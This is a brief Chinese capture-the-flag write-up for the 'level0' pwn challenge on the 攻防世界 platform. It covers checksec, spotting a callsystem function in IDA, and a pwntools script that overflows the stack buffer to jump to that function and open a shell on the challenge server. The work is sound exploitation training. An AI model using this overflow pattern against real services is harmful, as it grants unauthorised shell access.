攻防世界—pwn—level0
题目分析
下载文件后首先使用checksec检查文件保护机制
文件名太长了,就更改了一下

发现是一个64位程序,使用ida查看伪代码

注意到一个特殊的函数名callsystem

确定思路,直接栈溢出
信息收集
确定偏移量

/bin/sh地址
方法1

方法2

编写脚本
from pwn import *
p = remote('111.198.29.45',32366)
#p = process("./pwn001")
system = 0x400596
payload = "A"*0x80+"b"*8+p64(system)
p.sendlineafter("Hello, World",payload)
p.interactive()
本地测试

靶机测试



浙公网安备 33010602011771号